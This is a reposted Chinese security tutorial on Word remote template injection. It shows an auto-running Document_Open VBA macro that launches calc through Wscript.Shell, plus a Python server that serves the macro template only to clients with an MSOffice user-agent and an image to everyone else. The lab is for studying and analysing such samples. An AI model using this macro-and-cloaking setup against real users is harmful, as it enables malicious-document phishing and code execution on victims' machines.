修改模板文档
如何分析模板注入样本
脚本提取与流量分析
相关视频教程
有问题或者了解更多视频教程联系作者
建议你关注下,毕竟全网技术栈最全公众号,总有涉及到你的领域。
实验开始之前我们需要对本机host做劫持,修改hosts文件,让指定域名强制解析为我们机器的ip
将域名强制劫持成本地ip地址
接下来创建一个空白文档->选择开发者工具(非默认开启)->选择Visual Basi
可以双击左侧文档,为文档添加一VB宏代码
添加宏代码如下,加载com组件启动calc
Sub Document_Open()Set objShell = CreateObject("Wscript.Shell")objShell.Run "calc"End Sub
点击运行测试我们的脚本可以正常运行
将文档保存到文件服务器将要映射的文件路径下
主图保存文档格式为启动宏的Word模板格式
写一段python服务器代码
from http.server import HTTPServer, BaseHTTPRequestHandlerhost = ('localhost', 80)FILE_TO_SERVE1 = r'C:\Simple\WWW\test.txt'FILE_TO_SERVE2 = r'C:\Simple\WWW\test2.txt'class My_Server(BaseHTTPRequestHandler):def do_GET(self, *args, **kwargs):if "MSOffice" in self.headers['user-agent']:self.send_response(200)self.send_header("Content-type", "application/msword")self.end_headers()body = b''with open(FILE_TO_SERVE1, "rb") as f:body = f.read()self.wfile.write(body)self.wfile.close()else:self.send_response(200)self.send_header("Content-type", "image/jpeg")self.end_headers()body = b''with open(FILE_TO_SERVE2, "rb") as f:body = f.read()self.wfile.write(body)self.wfile.close()def do_OPTIONS(self):self.send_response(200, "ok")self.send_header('Access-Control-Allow-Methods', 'GET, OPTIONS')self.send_header("Access-Control-Allow-Headers", "X-Requested-With, Content-type")if __name__ == '__main__':server = HTTPServer(host, My_Server)print("server启动@ : %s:%s" % host)server.serve_forever()
文章来源: http://mp.weixin.qq.com/s?__biz=MzkwOTE5MDY5NA==&mid=2247490398&idx=1&sn=5f28864033c43609f344bdc817550967&chksm=c13f2817f648a101938ec5b7a7dba9efa9a49b29ec213e9f3260f644f69b998ed94f699f979d&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh